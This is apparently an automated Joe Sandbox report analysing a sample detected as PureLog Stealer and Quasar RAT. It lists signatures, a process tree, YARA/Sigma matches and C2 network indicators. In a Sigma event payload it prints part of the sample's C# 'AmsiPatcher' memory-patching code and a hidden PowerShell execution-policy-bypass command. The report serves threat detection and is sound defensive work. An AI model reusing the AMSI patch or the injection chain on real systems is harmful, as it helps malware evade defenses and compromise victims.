Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PI1qW7yV9K.exe

Overview

General Information

Sample name:PI1qW7yV9K.exe
renamed because original name is a hash value
Original sample name:af8da7f9142ae9bdee1fa3be93f0c8c1.exe
Analysis ID:1665177
MD5:af8da7f9142ae9bdee1fa3be93f0c8c1
SHA1:de5d591e4013f4fa6115a30e3c71d83b74c10bf9
SHA256:4a6389fb42a4918ca6b7aec6c86a4e945f85dfb6490f873f9be24fa5c7f9df06
Tags:exeuser-abuse_ch
Infos:

Detection

PureLog Stealer, Quasar
Score:100
Range:0 - 100
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected PureLog Stealer
Yara detected Quasar RAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Bypasses PowerShell execution policy
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects code into the Windows Explorer (explorer.exe)
Joe Sandbox ML detected suspicious sample
Queries sensitive service information (via WMI, MSSMBios_RawSMBiosTables, often done to detect sandboxes)
Queries temperature or sensor information (via WMI often done to detect virtual machines)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Alternate PowerShell Hosts - PowerShell Module
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • PI1qW7yV9K.exe (PID: 7384 cmdline: "C:\Users\user\Desktop\PI1qW7yV9K.exe" MD5: AF8DA7F9142AE9BDEE1FA3BE93F0C8C1)
    • conhost.exe (PID: 7440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7816 cmdline: "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NonInteractive -File "C:\Users\user\AppData\Local\Temp\ace9e5a3-2f4b-4e08-b92c-ed7f0e4c1ad2.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • csc.exe (PID: 6192 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\akylvhfm\akylvhfm.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
        • cvtres.exe (PID: 6200 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD89C.tmp" "c:\Users\user\AppData\Local\Temp\akylvhfm\CSC15D32CA6BA724B45B0CB2F57F81BE153.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
      • svchost.exe (PID: 2524 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • WMIADAP.exe (PID: 6200 cmdline: wmiadap.exe /F /T /R MD5: 1BFFABBD200C850E6346820E92B915DC)
      • svchost.exe (PID: 3388 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNoNetwork -p -s NcdAutoSetup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • explorer.exe (PID: 3084 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Quasar RAT, QuasarRATQuasar RAT is a malware family written in .NET which is used by a variety of attackers. The malware is fully functional and open source, and is often packed to make analysis of the source more difficult.
  • APT33
  • Dropping Elephant
  • Stone Panda
  • The Gorgon Group
https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
PI1qW7yV9K.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000008.00000002.2681806308.00000000104F0000.00000040.00000001.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
    • 0x188d10:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
    00000008.00000002.2689977678.00000000290A0000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_QuasarYara detected Quasar RATJoe Security
      00000008.00000002.2689977678.00000000290A0000.00000004.10000000.00040000.00000000.sdmpMAL_QuasarRAT_May19_1Detects QuasarRAT malwareFlorian Roth
      • 0x17156c:$x4: Uninstalling... good bye :-(
      00000008.00000002.2689977678.00000000290A0000.00000004.10000000.00040000.00000000.sdmpMAL_BackNet_Nov18_1Detects BackNet samplesFlorian Roth
      • 0x16e9a9:$s1: ProcessedByFody
      • 0x17577b:$s2: SELECT * FROM AntivirusProduct
      00000008.00000002.2686215912.0000000020B03000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_QuasarYara detected Quasar RATJoe Security
        Click to see the 7 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        8.2.explorer.exe.92b0000.0.raw.unpackJoeSecurity_QuasarYara detected Quasar RATJoe Security
          8.2.explorer.exe.92b0000.0.unpackJoeSecurity_QuasarYara detected Quasar RATJoe Security
            8.2.explorer.exe.290a0000.17.unpackJoeSecurity_QuasarYara detected Quasar RATJoe Security
              8.2.explorer.exe.290a0000.17.unpackMAL_QuasarRAT_May19_1Detects QuasarRAT malwareFlorian Roth
              • 0x16f76c:$x4: Uninstalling... good bye :-(
              8.2.explorer.exe.290a0000.17.unpackMAL_BackNet_Nov18_1Detects BackNet samplesFlorian Roth
              • 0x16cba9:$s1: ProcessedByFody
              • 0x17397b:$s2: SELECT * FROM AntivirusProduct
              Click to see the 8 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Script Interpreter Execution From Suspicious Folder
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NonInteractive -File "C:\Users\user\AppData\Local\Temp\ace9e5a3-2f4b-4e08-b92c-ed7f0e4c1ad2.ps1", CommandLine: "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NonInteractive -File "C:\Users\user\AppData\Local\Temp\ace9e5a3-2f4b-4e08-b92c-ed7f0e4c1ad2.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PI1qW7yV9K.exe", ParentImage: C:\Users\user\Desktop\PI1qW7yV9K.exe, ParentProcessId: 7384, ParentProcessName: PI1qW7yV9K.exe, ProcessCommandLine: "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NonInteractive -File "C:\Users\user\AppData\Local\Temp\ace9e5a3-2f4b-4e08-b92c-ed7f0e4c1ad2.ps1", ProcessId: 7816, ProcessName: powershell.exe
              Sigma detected: Suspicious Script Execution From Temp Folder
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NonInteractive -File "C:\Users\user\AppData\Local\Temp\ace9e5a3-2f4b-4e08-b92c-ed7f0e4c1ad2.ps1", CommandLine: "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NonInteractive -File "C:\Users\user\AppData\Local\Temp\ace9e5a3-2f4b-4e08-b92c-ed7f0e4c1ad2.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PI1qW7yV9K.exe", ParentImage: C:\Users\user\Desktop\PI1qW7yV9K.exe, ParentProcessId: 7384, ParentProcessName: PI1qW7yV9K.exe, ProcessCommandLine: "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NonInteractive -File "C:\Users\user\AppData\Local\Temp\ace9e5a3-2f4b-4e08-b92c-ed7f0e4c1ad2.ps1", ProcessId: 7816, ProcessName: powershell.exe
              Sigma detected: Alternate PowerShell Hosts - PowerShell Module
              Source: Event LogsAuthor: Roberto Rodriguez @Cyb3rWard0g: Data: ContextInfo: Severity = Informational Host Name = ConsoleHost Host Version = 5.1.19041.1682 Host ID = 20bf2611-63c3-43b9-8542-4438e7ab1df8 Host Application = C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NonInteractive -File C:\Users\user\AppData\Local\Temp\ace9e5a3-2f4b-4e08-b92c-ed7f0e4c1ad2.ps1 Engine Version = 5.1.19041.1682 Runspace ID = 905a113d-0c9b-44bb-b7e5-806f6cf673a6 Pipeline ID = 1 Command Name = Add-Type Command Type = Cmdlet Script Name = C:\Users\user\AppData\Local\Temp\ace9e5a3-2f4b-4e08-b92c-ed7f0e4c1ad2.ps1 Command Path = Sequence Number = 16 User = user-PC\user Connected User = Shell ID = Microsoft.PowerShell, EventID: 4103, Payload: CommandInvocation(Add-Type): "Add-Type"ParameterBinding(Add-Type): name="TypeDefinition"; value="using System;using System.Diagnostics;using System.Runtime.InteropServices;using System.Text;public class AmsiPatcher{ public const uint PROCESS_VM_OPERATION = 0x0008; public const uint PROCESS_VM_READ = 0x0010; public const uint PROCESS_VM_WRITE = 0x0020; public const uint TH32CS_SNAPPROCESS = 0x00000002; public static byte[] patch = new byte[] { 0xEB }; [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Auto)] public struct PROCESSENTRY32 { public uint dwSize; public uint cntUsage; public uint th32ProcessID; public IntPtr th32DefaultHeapID; public uint th32ModuleID; public uint cntThreads; public uint th32ParentProcessID; public int pcPriClassBase; public uint dwFlags; [MarshalAs(UnmanagedType.ByValTStr, SizeConst = 260)] public string szExeFile; } [DllImport("kernel32.dll")] public static extern IntPtr CreateToolhelp32Snapshot(uint dwFlags, uint th32ProcessID); [DllImport("kernel32.dll")] public static extern bool Process32First(IntPtr hSnapshot, ref PROCESSENTRY32 lppe); [DllImport("kernel32.dll")] public static extern bool Process32Next(IntPtr hSnapshot, ref PROCESSENTRY32 lppe); [DllImport("kernel32.dll")] public static extern bool CloseHandle(IntPtr hObject); [DllImport("kernel32.dll")] public static extern IntPtr OpenProcess(uint dwDesiredAccess, bool bInheritHandle, uint dwProcessId); [DllImport("kernel32.dll")] public static extern bool ReadProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, int dwSize, IntPtr lpNumberOfBytesRead); [DllImport("kernel32.dll")] public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, int dwSize, IntPtr lpNumberOfBytesWritten); [DllImport("kernel32.dll")] public static extern IntPtr LoadLibraryA(string lpFileName); [DllImport("kernel32.dll")] public static extern IntPtr GetProcAddress(IntPtr hModule, string lpProcName); public static int SearchPattern(byte
              Sigma detected: Change PowerShell Policies to an Insecure Level
              Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NonInteractive -File "C:\Users\user\AppData\Local\Temp\ace9e5a3-2f4b-4e08-b92c-ed7f0e4c1ad2.ps1", CommandLine: "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NonInteractive -File "C:\Users\user\AppData\Local\Temp\ace9e5a3-2f4b-4e08-b92c-ed7f0e4c1ad2.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PI1qW7yV9K.exe", ParentImage: C:\Users\user\Desktop\PI1qW7yV9K.exe, ParentProcessId: 7384, ParentProcessName: PI1qW7yV9K.exe, ProcessCommandLine: "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NonInteractive -File "C:\Users\user\AppData\Local\Temp\ace9e5a3-2f4b-4e08-b92c-ed7f0e4c1ad2.ps1", ProcessId: 7816, ProcessName: powershell.exe
              Sigma detected: Dynamic .NET Compilation Via Csc.EXE
              Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\akylvhfm\akylvhfm.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\akylvhfm\akylvhfm.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NonInteractive -File "C:\Users\user\AppData\Local\Temp\ace9e5a3-2f4b-4e08-b92c-ed7f0e4c1ad2.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7816, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\akylvhfm\akylvhfm.cmdline", ProcessId: 6192, ProcessName: csc.exe
              Sigma detected: Uncommon Svchost Parent Process
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt, CommandLine: C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NonInteractive -File "C:\Users\user\AppData\Local\Temp\ace9e5a3-2f4b-4e08-b92c-ed7f0e4c1ad2.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7816, ParentProcessName: powershell.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt, ProcessId: 2524, ProcessName: svchost.exe
              Sigma detected: Dynamic CSharp Compile Artefact
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7816, TargetFilename: C:\Users\user\AppData\Local\Temp\akylvhfm\akylvhfm.cmdline
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NonInteractive -File "C:\Users\user\AppData\Local\Temp\ace9e5a3-2f4b-4e08-b92c-ed7f0e4c1ad2.ps1", CommandLine: "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NonInteractive -File "C:\Users\user\AppData\Local\Temp\ace9e5a3-2f4b-4e08-b92c-ed7f0e4c1ad2.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PI1qW7yV9K.exe", ParentImage: C:\Users\user\Desktop\PI1qW7yV9K.exe, ParentProcessId: 7384, ParentProcessName: PI1qW7yV9K.exe, ProcessCommandLine: "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NonInteractive -File "C:\Users\user\AppData\Local\Temp\ace9e5a3-2f4b-4e08-b92c-ed7f0e4c1ad2.ps1", ProcessId: 7816, ProcessName: powershell.exe

              Data Obfuscation

              barindex
              Sigma detected: Dot net compiler compiles file from suspicious location
              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\akylvhfm\akylvhfm.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\akylvhfm\akylvhfm.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NonInteractive -File "C:\Users\user\AppData\Local\Temp\ace9e5a3-2f4b-4e08-b92c-ed7f0e4c1ad2.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7816, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\akylvhfm\akylvhfm.cmdline", ProcessId: 6192, ProcessName: csc.exe

              Suricata Signatures

              No Suricata rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Multi AV Scanner detection for submitted file
              Source: PI1qW7yV9K.exeVirustotal: Detection: 52%Perma Link
              Source: PI1qW7yV9K.exeReversingLabs: Detection: 55%
              Yara detected Quasar RAT
              Source: Yara matchFile source: 8.2.explorer.exe.92b0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.explorer.exe.92b0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.explorer.exe.290a0000.17.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.explorer.exe.290a0000.17.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000008.00000002.2689977678.00000000290A0000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.2686215912.0000000020B03000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.2648853929.00000000092B0000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              Joe Sandbox ML detected suspicious sample
              Source: Submited SampleNeural Call Log Analysis: 99.9%
              Source: PI1qW7yV9K.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 15.204.213.5:443 -> 192.168.2.5:49695 version: TLS 1.2
              Source: PI1qW7yV9K.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: 8C:\Users\user\AppData\Local\Temp\akylvhfm\akylvhfm.pdbhP source: powershell.exe, 00000002.00000002.1473986709.0000023206903000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: 8C:\Users\user\AppData\Local\Temp\akylvhfm\akylvhfm.pdb source: powershell.exe, 00000002.00000002.1473986709.0000023206903000.00000004.00000800.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exeCode function: 4x nop then jmp 0136476Fh0_2_013646F4
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exeCode function: 4x nop then jmp 0136476Fh0_2_01364773

              Networking

              barindex
              System process connects to network (likely due to code injection or exploit)
              Source: C:\Windows\explorer.exeNetwork Connect: 15.204.213.5 443Jump to behavior
              Source: C:\Windows\explorer.exeNetwork Connect: 85.192.49.163 4782Jump to behavior
              Source: global trafficTCP traffic: 192.168.2.5:49692 -> 85.192.49.163:4782
              Source: Joe Sandbox ViewIP Address: 15.204.213.5 15.204.213.5
              Source: Joe Sandbox ViewIP Address: 15.204.213.5 15.204.213.5
              Source: Joe Sandbox ViewASN Name: DINET-ASRU DINET-ASRU
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: unknownDNS query: name: ipwho.is
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0Host: ipwho.isConnection: Keep-Alive
              Source: unknownTCP traffic detected without corresponding DNS query: 85.192.49.163
              Source: unknownTCP traffic detected without corresponding DNS query: 85.192.49.163
              Source: unknownTCP traffic detected without corresponding DNS query: 85.192.49.163
              Source: unknownTCP traffic detected without corresponding DNS query: 85.192.49.163
              Source: unknownTCP traffic detected without corresponding DNS query: 85.192.49.163
              Source: unknownTCP traffic detected without corresponding DNS query: 85.192.49.163
              Source: unknownTCP traffic detected without corresponding DNS query: 85.192.49.163
              Source: unknownTCP traffic detected without corresponding DNS query: 85.192.49.163
              Source: unknownTCP traffic detected without corresponding DNS query: 85.192.49.163
              Source: unknownTCP traffic detected without corresponding DNS query: 85.192.49.163
              Source: unknownTCP traffic detected without corresponding DNS query: 85.192.49.163
              Source: unknownTCP traffic detected without corresponding DNS query: 85.192.49.163
              Source: unknownTCP traffic detected without corresponding DNS query: 85.192.49.163
              Source: unknownTCP traffic detected without corresponding DNS query: 85.192.49.163
              Source: unknownTCP traffic detected without corresponding DNS query: 85.192.49.163
              Source: unknownTCP traffic detected without corresponding DNS query: 85.192.49.163
              Source: unknownTCP traffic detected without corresponding DNS query: 85.192.49.163
              Source: unknownTCP traffic detected without corresponding DNS query: 85.192.49.163
              Source: unknownTCP traffic detected without corresponding DNS query: 85.192.49.163
              Source: unknownTCP traffic detected without corresponding DNS query: 85.192.49.163
              Source: unknownTCP traffic detected without corresponding DNS query: 85.192.49.163
              Source: unknownTCP traffic detected without corresponding DNS query: 85.192.49.163
              Source: unknownTCP traffic detected without corresponding DNS query: 85.192.49.163
              Source: unknownTCP traffic detected without corresponding DNS query: 85.192.49.163
              Source: unknownTCP traffic detected without corresponding DNS query: 85.192.49.163
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0Host: ipwho.isConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: c.pki.goog
              Source: global trafficDNS traffic detected: DNS query: ipwho.is
              Source: powershell.exe, 00000002.00000002.1548348801.0000023215E57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000002.00000002.1473986709.0000023205612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000002.00000002.1473986709.00000232049E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000002.00000002.1473986709.0000023205612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000002.00000002.1473986709.00000232049E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000002.00000002.1548348801.0000023215E57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000002.00000002.1548348801.0000023215E57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000002.00000002.1548348801.0000023215E57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000002.00000002.1473986709.0000023205612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000002.00000002.1473986709.0000023206012000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000002.00000002.1548348801.0000023215E57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: unknownNetwork traffic detected: HTTP traffic on port 49695 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49695
              Source: unknownHTTPS traffic detected: 15.204.213.5:443 -> 192.168.2.5:49695 version: TLS 1.2

              E-Banking Fraud

              barindex
              Yara detected Quasar RAT
              Source: Yara matchFile source: 8.2.explorer.exe.92b0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.explorer.exe.92b0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.explorer.exe.290a0000.17.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.explorer.exe.290a0000.17.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000008.00000002.2689977678.00000000290A0000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.2686215912.0000000020B03000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.2648853929.00000000092B0000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 8.2.explorer.exe.290a0000.17.unpack, type: UNPACKEDPEMatched rule: Detects QuasarRAT malware Author: Florian Roth
              Source: 8.2.explorer.exe.290a0000.17.unpack, type: UNPACKEDPEMatched rule: Detects BackNet samples Author: Florian Roth
              Source: 8.2.explorer.exe.290a0000.17.raw.unpack, type: UNPACKEDPEMatched rule: Detects QuasarRAT malware Author: Florian Roth
              Source: 8.2.explorer.exe.290a0000.17.raw.unpack, type: UNPACKEDPEMatched rule: Detects BackNet samples Author: Florian Roth
              Source: 00000008.00000002.2681806308.00000000104F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 00000008.00000002.2689977678.00000000290A0000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects QuasarRAT malware Author: Florian Roth
              Source: 00000008.00000002.2689977678.00000000290A0000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects BackNet samples Author: Florian Roth
              Source: 00000008.00000000.1431061226.00000000104F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 00000002.00000002.1548348801.0000023217860000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
